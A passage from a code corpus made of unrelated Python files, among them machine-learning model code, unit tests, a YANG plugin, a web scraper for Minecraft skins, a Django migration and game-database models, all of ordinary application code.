0: AxisType(BatchTag),
1: AxisType(TimeTag)
}),
"output_mask":
NeuralType({
0: AxisType(BatchTag),
1: AxisType(TimeTag)
}),
"labels":
NeuralType({0: AxisType(BatchTag)}),
}
return input_ports, output_ports
def __init__(self, *, tokenizer, dataset, name, max_seq_length,
sentence_indices_filename=None, mask_probability=0.15,
**kwargs):
DataLayerNM.__init__(self, **kwargs)
self._device = torch.device(
"cuda" if self.placement in [DeviceType.GPU, DeviceType.AllGpu]
else "cpu"
)
self._dataset = BertPretrainingDataset(
tokenizer=tokenizer,
dataset=dataset,
name=name,
sentence_indices_filename=sentence_indices_filename,
max_length=max_seq_length,
mask_probability=mask_probability)
def __len__(self):
return len(self._dataset)
@property
def dataset(self):
return self._dataset
@property
def data_iterator(self):
return None
|
StarcoderdataPython
|
3378401
|
from typing import Callable, Iterable
import numpy as np
from sklearn.base import BaseEstimator, ClassifierMixin, RegressorMixin
from sklearn.linear_model import Ridge
from sklearn.metrics import r2_score
from sklearn.preprocessing import LabelBinarizer
from rvfln.activation import ActivationFunction, LeakyReLU
from rvfln.rvfln import RVFLNRegressor, matricise
class BLSRegressor(RVFLNRegressor):
"""
Broad Learning System estimator using ridge regression as its fitting procedure.
The model uses Sklearns API for ease of use.
(note: incremental fitting procedures may be implemented in the future once I'm smart enough to understand the paper)
----------
Attributes:
n_z: int - Number of mapped features
n_z_features: int - Number of features in each mapped feature
n_h: int - Number of enhancement nodes
activation_mapped_feature: ActivationFunction = LeakyReLU - Activation function for mapped features
activation_enhancement: ActivationFunction = LeakyReLU - Activation function for enhancement nodes
alpha: float = 0.5 - Regularization parameter of the ridge regression
Training data:
X: ndarray - Matrix containing the input of the network
Y: ndarray - Matrix containing the output of the network (if a vector is supplied, it is converted into a column vector)
Parameters:
We: ndarray - Random weights for the mapped features in the network shape=(n_z, input_features, n_z_features)
Be: ndarray - Random biases for the mapped features in the network shape=(n_z * n_z_features)
super(): RVFLNRegressor - The random vector functional link network this model is based on
"""
def __init__(
self,
n_z: int,
n_z_features: int,
n_h: int,
activation_mapped_feature: ActivationFunction = LeakyReLU,
activation_enhancement: ActivationFunction = LeakyReLU,
alpha: float = 0.5,
):
self.n_z = n_z
self.n_z_features = n_z_features
self.n_h = n_h
self.activation_mapped_feature = activation_mapped_feature
self.activation_enhancement = activation_enhancement
super().__init__(
n_enhancement=n_h, alpha=alpha, activation=activation_enhancement
)
def fit(self, X: np.ndarray, Y: np.ndarray):
X = matricise(X)
Y = matricise(Y)
if X is None:
raise ValueError(
"X is not a matrix or vector, please provide a matrix or vector"
)
if Y is None:
raise ValueError(
"Y is not a matrix or vector, please provide a matrix or vector"
)
self.input_features = X.shape[1]
self.output_features = Y.shape[1]
self.We = np.random.standard_normal(
size=(self.n_z, X.shape[1], self.n_z_features)
)
self.Be = np.random.standard_normal(size=(self.n_z_features * self.n_z))
Z = np.concatenate(X @ self.We, axis=1) + self.Be
Z = self.activation_mapped_feature(Z)
super().fit(Z, Y)
return self
def predict(self, X: np.ndarray) -> np.ndarray:
X = matricise(X)
if X is None:
raise ValueError(
"X is not a matrix or vector, please provide a matrix or vector"
)
if X.shape[1] != self.input_features:
raise ValueError(
"The supplied X has a different number of features from the one the model was fitted on."
)
if self.We is None:
raise ValueError(
"The model has not been fitted yet, please fit before trying to predict"
)
Z = np.concatenate(X @ self.We, axis=1) + self.Be
Z = self.activation_mapped_feature(Z)
return super().predict(Z)
def score(self, X: np.ndarray) -> float:
Y = matricise(Y)
if Y is None:
raise ValueError(
"Y is not a matrix or vector, please provide a matrix or vector"
)
return r2_score(self.predict(X), Y)
class BLSClassifier(BLSRegressor, ClassifierMixin):
"""
BLS Classifier using the Sklearn Classifier API.
----
Attributes:
n_z: int - Number of mapped features
n_z_features: int - Number of features in each mapped feature
n_h: int - Number of enhancement nodes
activation_mapped_feature: ActivationFunction = LeakyReLU - Activation function for mapped features
activation_enhancement: ActivationFunction = LeakyReLU - Activation function for enhancement nodes
alpha: float = 0.5 - Regularization parameter of the ridge regression
Training data:
X: ndarray - Matrix containing the input of the network
y: Iterable - sequence of labels
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def fit(self, X: np.ndarray, y: Iterable):
self.encoder = LabelBinarizer()
Y = self.encoder.fit_transform(y)
super().fit(X, Y)
return self
def predict(self, X: np.ndarray) -> np.ndarray:
Y = super().predict(X)
Y = np.around(Y)
y = self.encoder.inverse_transform(Y)
return np.array(y)
def score(self, X: np.ndarray, y: Iterable) -> float:
y_hat = self.predict(X)
y = np.array(y)
return sum(y == y_hat) / y.size
|
StarcoderdataPython
|
112855
|
import cv2
import gc
import numpy as np
from ctypes import *
__all__ = ['darknet_resize']
class IMAGE(Structure):
_fields_ = [("w", c_int),
("h", c_int),
("c", c_int),
("data", POINTER(c_float))]
lib = CDLL("darknet/libdarknet.so", RTLD_GLOBAL)
resize_image = lib.resize_image
resize_image.argtypes = [IMAGE, c_int, c_int]
resize_image.restype = IMAGE
free_image = lib.free_image
free_image.argtypes = [IMAGE]
@profile
def array_to_image(arr):
# share memory
arr = arr.transpose(2, 0, 1)
c, h, w = arr.shape[:3]
arr = np.ascontiguousarray(arr.flat, dtype=np.float32)
data = arr.ctypes.data_as(POINTER(c_float))
im = IMAGE(w, h, c, data)
return im, arr
@profile
def image_to_array(im, shape):
# share memory
# python won't free c objects
arr = np.ctypeslib.as_array(im.data, shape=(shape[2], shape[0], shape[1]))
arr = arr.transpose((1, 2, 0))
return arr
@profile
def darknet_resize(im, shape):
# shape: (h, w)
image, _ = array_to_image(im)
image_resize = resize_image(image, shape[1], shape[0])
image_resize_np = image_to_array(image_resize, shape)
free_image(image_resize)
return image_resize_np
@profile
def test_darknet_resize():
image_path = 'darknet/data/dog.jpg'
a = cv2.imread(image_path)
ar = darknet_resize(a, (416, 416, 3))
del a
del ar
gc.collect()
b = cv2.imread(image_path)
br = darknet_resize(b, (416, 416, 3))
del b
del br
gc.collect()
c = cv2.imread(image_path)
cr = darknet_resize(c, (416, 416, 3))
del c
del cr
gc.collect()
"""
image_resize_cv2 = cv2.resize(image, (416, 416), interpolation=cv2.INTER_LINEAR)
print(image_resize_cv2.shape)
"""
"""
python3 -m memory_profiler models/darknet_utils.py
"""
if __name__ == '__main__':
test_darknet_resize()
|
StarcoderdataPython
|
105388
|
<filename>appTests/TwitterCompetitionsBotTests.py
import unittest
import mock
from unittest.mock import call
from app.freemiumwebapp.adminConstants import AdminConstants
from app.freemiumwebapp.twitterHook import TwitterHook
from app.freemiumwebapp.TwitterCompetitionsBot import TwitterCompetitionsBot
class TwitterCompetitionsBotTests(unittest.TestCase):
admin_constants = AdminConstants()
queries = admin_constants.twitter_queries
def test_bot_can_init(self):
twitter_hook = TwitterHook()
bot = TwitterCompetitionsBot(twitter_hook)
self.assertIsNotNone(bot)
@mock.patch('app.freemiumwebapp.twitterHook.TwitterHook')
def test_bot_can_search_tweets_multiple_queries(self, twitter_hook):
bot = TwitterCompetitionsBot(twitter_hook)
bot.Run()
calls = []
for query in self.queries:
calls.append(call(query))
twitter_hook.search_by_query.assert_has_calls(calls)
@mock.patch('app.freemiumwebapp.twitterHook.TwitterHook')
def test_bot_can_retweet_competitions(self, twitter_hook):
test = ''
|
StarcoderdataPython
|
3326062
|
from dominion_object_model import object_model
class GameClient(object_model.GameClient):
"""Game represents the specific game domain
In this case Dominion
"""
def __init__(self, game):
self.game = game
def play_action_card(self, card_type):
return self.game.play_action_card(card_type)
def buy(self, card):
return self.game.buy(card)
def done(self):
self.game.done()
|
StarcoderdataPython
|
1778071
|
<reponame>chokoswitch/stellarstation-api
# Copyright 2019 Infostellar, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The integration tests for OpenSatelliteStream API in StellarStationService."""
from queue import Queue
from stellarstation.api.v1 import stellarstation_pb2
SATELLITE_ID = '98'
# This test checks the expected status after sending status change command.
def test_open_satellite_stream(stub_factory):
client = stub_factory.get_satellite_service_stub()
request_queue = Queue()
request_iterator = generate_request(request_queue)
expected_status = -1
for response in client.OpenSatelliteStream(request_iterator):
if response.HasField("receive_telemetry_response"):
telemetry_data = response.receive_telemetry_response.telemetry.data
assert len(telemetry_data) > 1
# The second last byte of the telemetry indicates the current status of the fake satellite used
# in the test. The value is either of 0 or 1.
is_safe_mode = int(telemetry_data[-2])
assert (is_safe_mode == 0 or is_safe_mode == 1)
if expected_status < 0:
# Set expected status based on the current value.
expected_status = 1 - is_safe_mode
# Send the command to toggle the state.
command = [bytes(b"\x01\x01")]
request_queue.put(command)
else:
assert is_safe_mode == expected_status
return
else:
gs_state = response.stream_event.plan_monitoring_event.ground_station_state
assert gs_state.HasField("antenna")
assert gs_state.antenna.azimuth.command == 1.0
assert gs_state.antenna.azimuth.measured == 1.02
assert gs_state.antenna.elevation.command == 20.0
assert gs_state.antenna.elevation.measured == 19.5
# Yields a request sent to the stream opened by OpenSatelliteStream.
def generate_request(queue):
# Send the first request to activate the stream. Telemetry will start
# to be received at this point.
yield stellarstation_pb2.SatelliteStreamRequest(satellite_id=SATELLITE_ID)
while True:
commands = queue.get()
command_request = stellarstation_pb2.SendSatelliteCommandsRequest(command=commands)
satellite_stream_request = stellarstation_pb2.SatelliteStreamRequest(
satellite_id=SATELLITE_ID,
send_satellite_commands_request=command_request)
yield satellite_stream_request
queue.task_done()
|
StarcoderdataPython
|
3207294
|
<reponame>einarnn/pyang-plugins
"""YANG output plugin"""
import optparse
import re
from pyang import plugin
from pyang import util
from pyang import grammar
def pyang_plugin_init():
plugin.register_plugin(StripPlugin())
class StripPlugin(plugin.PyangPlugin):
def add_output_format(self, fmts):
fmts['strip'] = self
self.handle_comments = True
def add_opts(self, optparser):
optlist = [
optparse.make_option("--strip-module", type=str,
dest="strip_module",
help="Colon-separated list of module names to strip out"),
optparse.make_option("--strip-yang-canonical",
dest="strip_yang_canonical",
action="store_true",
help="Print in canonical order"),
optparse.make_option("--strip-yang-remove-unused-imports",
dest="strip_yang_remove_unused_imports",
action="store_true"),
]
g = optparser.add_option_group("Strip output specific options")
g.add_options(optlist)
def emit(self, ctx, modules, fd):
module = modules[0]
ctx.opts.strip_module = ctx.opts.strip_module.split(':')
emit_yang(ctx, module, fd)
def emit_yang(ctx, module, fd):
emit_stmt(ctx, module, fd, 0, None, '', ' ')
_force_newline_arg = ('description', 'contact', 'organization')
_non_quote_arg_type = ('identifier', 'identifier-ref', 'boolean', 'integer',
'non-negative-integer', 'date', 'ordered-by-arg',
'fraction-digits-arg', 'deviate-arg', 'version',
'status-arg')
_kwd_class = {
'yang-version': 'header',
'namespace': 'header',
'prefix': 'header',
'belongs-to': 'header',
'organization': 'meta',
'contact': 'meta',
'description': 'meta',
'reference': 'meta',
'import': 'linkage',
'include': 'linkage',
'revision': 'revision',
'typedef': 'defs',
'grouping': 'defs',
'identity': 'defs',
'feature': 'defs',
'extension': 'defs',
'_comment': 'comment',
'module': None,
'submodule': None,
}
def get_kwd_class(keyword):
if util.is_prefixed(keyword):
return 'extension'
else:
try:
return _kwd_class[keyword]
except KeyError:
return 'body'
_keyword_with_trailing_newline = (
'typedef',
'grouping',
'identity',
'feature',
'extension',
)
def emit_stmt(ctx, stmt, fd, level, prev_kwd_class, indent, indentstep):
if ctx.opts.strip_module and stmt.keyword == 'import' and stmt.arg in ctx.opts.strip_module:
return
if isinstance(stmt.keyword, tuple):
kw_module, _ = stmt.keyword
if kw_module in ctx.opts.strip_module:
return
if ctx.opts.strip_yang_remove_unused_imports and stmt.keyword == 'import':
for p in stmt.parent.i_unused_prefixes:
if stmt.parent.i_unused_prefixes[p] == stmt:
return
if util.is_prefixed(stmt.raw_keyword):
(prefix, identifier) = stmt.raw_keyword
keyword = prefix + ':' + identifier
else:
keyword = stmt.keyword
kwd_class = get_kwd_class(stmt.keyword)
if ((level == 1 and
kwd_class != prev_kwd_class and kwd_class != 'extension') or
stmt.keyword in _keyword_with_trailing_newline):
fd.write('\n')
if keyword == '_comment':
emit_comment(stmt.arg, fd, indent)
return
fd.write(indent + keyword)
if stmt.arg != None:
if keyword in grammar.stmt_map:
(arg_type, _subspec) = grammar.stmt_map[keyword]
if arg_type in _non_quote_arg_type:
fd.write(' ' + stmt.arg)
else:
emit_arg(stmt, fd, indent, indentstep)
else:
emit_arg(stmt, fd, indent, indentstep)
if len(stmt.substmts) == 0:
fd.write(';\n')
else:
fd.write(' {\n')
if ctx.opts.strip_yang_canonical:
substmts = grammar.sort_canonical(stmt.keyword, stmt.substmts)
else:
substmts = stmt.substmts
if level == 0:
kwd_class = 'header'
for s in substmts:
emit_stmt(ctx, s, fd, level + 1, kwd_class,
indent + indentstep, indentstep)
kwd_class = get_kwd_class(s.keyword)
fd.write(indent + '}\n')
def emit_arg(stmt, fd, indent, indentstep):
"""Heuristically pretty print the argument string"""
# current alg. always print a double quoted string
arg = stmt.arg
arg = arg.replace('\\', r'\\')
arg = arg.replace('"', r'\"')
arg = arg.replace('\t', r'\t')
lines = arg.splitlines(True)
if len(lines) <= 1:
if len(arg) > 0 and arg[-1] == '\n':
arg = arg[:-1] + r'\n'
if stmt.keyword in _force_newline_arg:
fd.write('\n' + indent + indentstep + '"' + arg + '"')
else:
fd.write(' "' + arg + '"')
else:
fd.write('\n')
fd.write(indent + indentstep + '"' + lines[0])
for line in lines[1:-1]:
fd.write(indent + indentstep + ' ' + line)
# write last line
fd.write(indent + indentstep + ' ' + lines[-1])
if lines[-1][-1] == '\n':
# last line ends with a newline, indent the ending quote
fd.write(indent + indentstep + '"')
else:
fd.write('"')
def emit_comment(comment, fd, indent):
lines = comment.splitlines(True)
for x in lines:
if x[0] == '*':
fd.write(indent + ' ' + x)
else:
fd.write(indent + x)
fd.write('\n')
|
StarcoderdataPython
|
1690699
|
import datetime
from .base import BandoriObject
###############################################################################
# Bandori Database models
class DCard(BandoriObject):
'''
Represents a bang dream card
'''
def __init__(self, data: dict, id_name='cardId', region='en/'):
super().__init__(data, id_name, region)
self.character_id = data.get("characterId")
self.rarity = data.get("rarity")
self.attribute = data.get("attr")
self.skill_id = data.get("skillId")
self.title = data.get("title")
self.level_limit = data.get("levelLimit")
self.res_link = (self.URL_GA_RES
+ '/assets/characters/resourceset/'
+ data.get("cardRes")
+ '_rip/'
)
self.image = self.res_link + 'card_normal.png'
self.image_trained = self.res_link + 'card_after_training.png'
self.trim = self.res_link + 'trim_normal.png'
self.trim_trained = self.res_link + 'trim_after_training.png'
self.live2d_link = (self.URL_GA_RES
+ '/assets/characters/livesd/'
+ data.get("live2dRes")
+ '_rip/'
)
self.chibi = self.live2d_link + 'sdchara.png'
self.costume_id = data.get("costumeId")
self.released_at = data.get("releasedAt")
self.min_stats = data.get("simpleParams").get("min")
self.max_stats = data.get("simpleParams").get("max")
def get_skill(self):
d = self._api_get(url=self.URL_GA + 'skill/' + str(self.skill_id),
party=False
)
return DSkill(data=d, region=self.region)
class DSkill(BandoriObject):
'''
Represents a Card's skill.
'''
def __init__(self, data: dict, id_name='skillId', region='en/'):
super().__init__(data, id_name, region)
self.skill_level = data.get("skillLevel")
self.duration = data.get("duration")
self.short_description = data.get("simpleDescription")
self.description = data.get("description")
self.skill_type = data.get("skillSortType")
class DMember(BandoriObject):
'''
Represents a bang dream member.
Referred to as Character in bandori database.
'''
def __init__(self, data: dict, id_name='characterId', region='en/'):
super().__init__(data, id_name, region)
self.character_type = data.get("characterType")
self.band_id = data.get("bandId")
self.name = data.get("characterName")
self.ruby = data.get("ruby")
self.detailed_data = self._api_get(id=[self.id],
url=self.URL_GA+'chara/')
class DDegree(BandoriObject):
'''
Represents a ranking from bang dream event.
'''
def __init__(self, data: dict, id_name='degreeId', region='en/'):
super().__init__(data, id_name, region)
self.seq = data.get("seq")
self.image_name = data.get("imageName")
self.degree_rank = data.get("degreeRank")
self.degree_name = data.get("degreeName")
self.degree_type = data.get("degreeType")
self.icon = data.get("iconImageName")
self.description = data.get("description")
class DComic(BandoriObject):
'''
Represents a loading screen koma.
'''
def __init__(self, data: dict,
id_name='singleFrameCartoonId', region='en/'):
super().__init__(data, id_name, region)
self.title = data.get("title")
self.asset_name = data.get("assetBundleName")
self.seq = data.get("seq")
self.subTitle = data.get("subTitle")
self.asset_link = (self.URL_GA_RES
+ data.get("assetAddress")
)
class DStamp(BandoriObject):
'''
Represents a stamp
'''
def __init__(self, data, id_name='stampId', region='en/'):
super().__init__(data, id_name=id_name, region=region)
self.seq = data.get("seq")
self.image_link = (self.URL_GA_RES
+ '/stamp/01_rip/'
+ data.get("imageName")
+ '.png'
)
self.type = data.get("stampType")
class DBand(BandoriObject):
'''
Represents a bang dream band
'''
def __init__(self, data: dict, id_name='bandId', region='en/'):
super().__init__(data, id_name, region)
self.name = data.get("bandName")
self.introduction = data.get("introductions")
self.type = data.get("bandType")
self.members = [data.get("leader", -5), data.get("member1", -5),
data.get("member2", -5), data.get("member3", -5),
data.get("member4", -5)]
# Note: bands past Roselia have messed up members.
def get_band_members(self):
d = self._api_get(id=self.members,
url=self.URL_GA+'chara/',
party=False)
return [DMember(data) for data in d]
class DSong(BandoriObject):
'''
Represents a playable song in bang dream
'''
def __init__(self, data: dict, id_name='musicId', region='en/'):
super().__init__(data, id_name, region)
self.title = data.get("title")
self.bgm = self.URL_GA_RES + data.get("bgmFile", '')
self.thumb = self.URL_GA_RES + data.get("thumb", '')
self.jacket = self.URL_GA_RES + data.get("jacket", '')
self.band_name = data.get("bandName")
self.band = data.get("bandId")
self.difficulty = data.get("difficulty")
self.how_to_get = data.get("howToGet")
self.achievements = data.get("achievements")
self.published_at = data.get("publishedAt")
self.closed_at = data.get("closedAt")
self.composer = data.get("composer")
self.lyricist = data.get("lyricist")
self.arranger = data.get("arranger")
class DGacha(BandoriObject):
'''
Represents a gacha in bang dream
'''
def __init__(self, data: dict, id_name='gachaId', region='en/'):
super().__init__(data, id_name, region)
self.name = data.get("gachaName")
self.start_date = data.get("publishedAt")
self.end_date = data.get("closedAt")
self.description = data.get("description")
self.rates = data.get("rates")
self.annotation = data.get("annotation")
self.gacha_period = data.get("gachaPeriod")
self.sub_name = data.get("gachaSubName")
self.type = data.get("gachaType")
def get_start_date(self):
return datetime.datetime.fromtimestamp(int(self.start_date) / 1000)
def get_end_date(self):
return datetime.datetime.fromtimestamp(int(self.end_date) / 1000)
class DEvent(BandoriObject):
'''
Represents an event in bang dream
'''
def __init__(self, data, id_name='eventId', region='en/'):
super().__init__(data, id_name=id_name, region=region)
self.type = data.get("eventType")
self.name = data.get("eventName")
self.asset_name = data.get("assetBundleName")
self.start_date = data.get("startAt")
self.end_date = data.get("endAt")
self.enabled = data.get("enableFlag")
self.bgm_asset_name = data.get("bgmAssetBundleName")
self.bgm_file_name = data.get("bgmFileName")
self.point_rewards = data.get("pointRewards")
self.rank_rewards = data.get("rankingRewards")
self.detail = data.get("detail")
|
StarcoderdataPython
|
1666427
|
import uuid
def get_mac():
mac_num = hex(uuid.getnode()).replace('0x', '').upper()
mac = '-'.join(mac_num[i: i + 2] for i in range(0, 11, 2))
return mac
print (get_mac())
|
StarcoderdataPython
|
1785606
|
import subprocess
import tempfile
import os
def _exec_notebook(path):
with tempfile.NamedTemporaryFile(suffix=".ipynb") as fout:
args = ["jupyter", "nbconvert", "--to", "notebook", "--execute",
"--ExecutePreprocessor.timeout=None",
"--output", fout.name, path]
subprocess.check_call(args)
def test():
_exec_notebook('examples/Example1_CentralPeak.ipynb')
_exec_notebook('examples/Example2_Band_Peak_Power.ipynb')
_exec_notebook('examples/Example3_CorrelationCoefficient.ipynb')
#name_examples = os.listdir('examples')
# for ex in name_examples:
# _exec_notebook('examples/'+ex)
"""Option 2"""
# jupyter nbconvert --ExecutePreprocessor.timeout=1000 --to notebook --execute examples/Example1_CentralPeak.ipynb
|
StarcoderdataPython
|
3291816
|
<reponame>hurek/peeker_bot
from telegram.ext import CallbackQueryHandler, CommandHandler, ConversationHandler, Filters, MessageHandler
from conversations.announce import announce, send_announce
from conversations.conv_utils import ANNOUNCE, CHAT_TIMEOUT, STORE_ADDRESS, WAIT_FEEDBACK, cancel, \
chat_timeout
from conversations.feedback import feedback, send_feedback
from conversations.keyboards import SKIP_TUTORIAL, TUTORIAL_ENTRY, NEW_NAME, RENAME, TUTORIAL_STEP_TWO
from conversations.my_adresses import incorrect_name, new_operator_name, rename_operator_address
from conversations.new_address import add_address, incorrect_address, store_address
from conversations.tutorial import get_started, tutorial_entry, tutorial_step_two
class RenameOperatorHandler(ConversationHandler):
def __init__(self):
super().__init__(
entry_points=[CallbackQueryHandler(rename_operator_address, pattern='^' + str(RENAME) + '$')],
states={
NEW_NAME: [MessageHandler(Filters.regex('^([a-zA-Z0-9 ]{1,40}$)'), new_operator_name),
MessageHandler(Filters.text, incorrect_name)],
ConversationHandler.TIMEOUT: [MessageHandler(Filters.text | Filters.command, chat_timeout)],
},
conversation_timeout=CHAT_TIMEOUT,
fallbacks=[CommandHandler('cancel', cancel), MessageHandler(Filters.regex('^(⬅️Back)$'), cancel)],
)
class NewAddressHandler(ConversationHandler):
def __init__(self):
super().__init__(
entry_points=[MessageHandler(Filters.regex('^(📝New Address)$'), add_address)],
states={
STORE_ADDRESS: [MessageHandler(Filters.regex('^(0x[a-fA-F0-9]{40})'), store_address),
MessageHandler(Filters.regex('^(⬅️Back)$'), cancel),
MessageHandler(Filters.text, incorrect_address)],
ConversationHandler.TIMEOUT: [MessageHandler(Filters.text | Filters.command, chat_timeout)],
},
conversation_timeout=CHAT_TIMEOUT,
fallbacks=[CommandHandler('cancel', cancel), MessageHandler(Filters.regex('^(⬅️Back)$'), cancel)],
)
class AnnounceHandler(ConversationHandler):
def __init__(self):
super().__init__(
entry_points=[CommandHandler("announce", announce)],
states={
ANNOUNCE: [MessageHandler(Filters.regex('^(⬅️Back)$'), cancel),
MessageHandler(Filters.text, send_announce)],
ConversationHandler.TIMEOUT: [MessageHandler(Filters.text | Filters.command, chat_timeout)],
},
conversation_timeout=CHAT_TIMEOUT,
fallbacks=[CommandHandler('cancel', cancel), MessageHandler(Filters.regex('^(⬅️Back)$'), cancel)],
)
class FeedbackHandler(ConversationHandler):
def __init__(self):
super().__init__(
entry_points=[MessageHandler(Filters.regex('^(📨Feedback)$'), feedback)],
states={
WAIT_FEEDBACK: [MessageHandler(Filters.regex('^(⬅️Back)$'), cancel),
MessageHandler(Filters.text, send_feedback)],
ConversationHandler.TIMEOUT: [MessageHandler(Filters.text | Filters.command, chat_timeout)],
},
conversation_timeout=CHAT_TIMEOUT,
fallbacks=[CommandHandler('cancel', cancel), MessageHandler(Filters.regex('^(⬅️Back)$'), cancel)]
)
class UserGuideHandler(ConversationHandler):
def __init__(self):
super().__init__(
entry_points=[CallbackQueryHandler(tutorial_entry, pattern='^' + str(TUTORIAL_ENTRY) + '$'),
CallbackQueryHandler(get_started, pattern='^' + str(SKIP_TUTORIAL) + '$'),
CommandHandler('tutorial', tutorial_entry)],
states={
TUTORIAL_STEP_TWO: [CallbackQueryHandler(tutorial_step_two, pattern='^' + str(TUTORIAL_STEP_TWO) + '$')],
ConversationHandler.TIMEOUT: [MessageHandler(Filters.text | Filters.command, chat_timeout)],
},
conversation_timeout=CHAT_TIMEOUT,
fallbacks=[CallbackQueryHandler(get_started, pattern='^' + str(SKIP_TUTORIAL) + '$')]
)
|
StarcoderdataPython
|
1769629
|
<gh_stars>0
import scrapy
import re
from skindl.items import SkinItem
class MinecraftskinsSpider(scrapy.Spider):
name = 'minecraftskins'
allowed_domains = ['www.minecraftskins.net']
start_urls = ['http://www.minecraftskins.net/']
def parse(self, response):
for content in response.xpath('//div[@class="row grid"]'):
skinItem = SkinItem()
for skin in content.xpath('//div[@class="card"]'):
skinItem['title'] = skin.xpath('//h2[@class="card-title"]/text()').getall()
skinItem['description'] = skin.xpath('//p[@class="card-description"]/text()').getall()
skinItem['designer'] = skin.xpath('//h3[@class="card-designer"]/text()').getall()
skinItem['preview_url'] = skin.xpath('//div[@class="card-image"]//img/@src').getall()
skinItem['preview_url'] = [response.urljoin(re.sub("front_preview","preview",u)) for u in skinItem['preview_url']]
skinItem['skin_url'] = skin.xpath('//div[@class="card-controls clearfix"]//a[2]/@href').getall()
skinItem['skin_url'] = [response.urljoin(u) for u in skinItem['skin_url']]
yield skinItem
### Get Next page if available ###
# next_page = response.xpath('//a[@class="next-page"]/@href').get()
# if next_page is not None:
# next_page = response.urljoin(next_page)
# yield scrapy.Request(next_page, callback=self.parse)
##### alternate
for href in response.xpath('//a[@class="next-page"]/@href'):
yield response.follow(href, callback=self.parse)
|
StarcoderdataPython
|
161756
|
# Generated by Django 2.0 on 2019-07-07 02:24
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('pages', '0005_accessanalysis'),
]
operations = [
migrations.CreateModel(
name='CategoryTools',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
options={
'verbose_name': '工具分类关联',
'verbose_name_plural': '工具分类关联',
},
),
migrations.CreateModel(
name='Tool',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200, verbose_name='工具名')),
('cover', models.TextField(blank=True, default=None, null=True, verbose_name='封面')),
('cover_type', models.CharField(blank=True, choices=[('LINK', ''), ('TEXT', '')], default=None, max_length=55, null=True, verbose_name='封面类型')),
('intro', models.TextField(blank=True, default=None, null=True, verbose_name='简介')),
('detail', models.TextField(blank=True, default=None, null=True, verbose_name='详细(使用)介绍')),
('index', models.IntegerField(default=1, verbose_name='排序索引')),
('display', models.BooleanField(default=True, verbose_name='是否显示')),
],
options={
'verbose_name': '工具',
'verbose_name_plural': '工具',
},
),
migrations.CreateModel(
name='ToolCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200, verbose_name='分类名')),
('index', models.IntegerField(default=1, verbose_name='排序索引')),
('display', models.BooleanField(default=True, verbose_name='是否显示')),
('tools', models.ManyToManyField(through='pages.CategoryTools', to='pages.Tool')),
],
options={
'verbose_name': '工具分类',
'verbose_name_plural': '工具分类',
},
),
migrations.AddField(
model_name='categorytools',
name='category',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pages.ToolCategory'),
),
migrations.AddField(
model_name='categorytools',
name='tool',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pages.Tool'),
),
]
|
StarcoderdataPython
|
3273371
|
<gh_stars>10-100
# The MIT License (MIT)
#
# Copyright (c) 2021 NVIDIA CORPORATION
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import torch
import torchvision.models as models
import argparse
import os
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--save", default="model.onnx")
args = parser.parse_args()
resnet50 = models.resnet50(pretrained=True)
dummy_input = torch.randn(1, 3, 224, 224)
resnet50 = resnet50.eval()
torch.onnx.export(resnet50,
dummy_input,
args.save,
export_params=True,
opset_version=10,
do_constant_folding=True,
input_names=['input'],
output_names=['output'],
dynamic_axes={'input': {0: 'batch_size', 2: "height", 3: 'width'},
'output': {0: 'batch_size'}})
print("Saved {}".format(args.save))
|
StarcoderdataPython
|
1796676
|
<filename>tests/test_lut.py
from aetherling.modules.lut_any_type import DefineLUTAnyType
from magma import *
from magma.bitutils import *
import fault
from aetherling.helpers.fault_helpers import compile_and_run
import builtins
def test_lut_11_13():
width = 11
numOut = 13
T = Array[width, BitOut]
init = [builtins.tuple(int2seq(i, width)) for i in range(4, numOut+4)]
testcircuit = DefineLUTAnyType(T, numOut, builtins.tuple(init))
tester = fault.Tester(testcircuit, testcircuit.CLK)
for i in range(numOut):
tester.circuit.addr = i
tester.eval()
tester.circuit.data.expect(i + 4)
compile_and_run(tester)
|
StarcoderdataPython
|
1797832
|
import numpy as np
def get_tree_slow(sorted_indices, adj):
block = []
treeNumber = {}
nTrees = 0
for coordinate in sorted_indices:
neighbors = np.nonzero(adj[coordinate])[0]
nn = np.intersect1d(neighbors, block)
neighTrees = set()
continueFlag = False
for neigh in nn:
if treeNumber[neigh] not in neighTrees:
neighTrees.add(treeNumber[neigh])
else:
continueFlag = True
break
if continueFlag:
continue
# if nn.size > 2:
# continue
if nn.size == 0:
treeNumber[coordinate] = nTrees
nTrees += 1
else:
treeNumber[coordinate] = nTrees
for neigh in nn:
treeID = treeNumber[neigh]
for tree_ in treeNumber:
if treeNumber[tree_] == treeID:
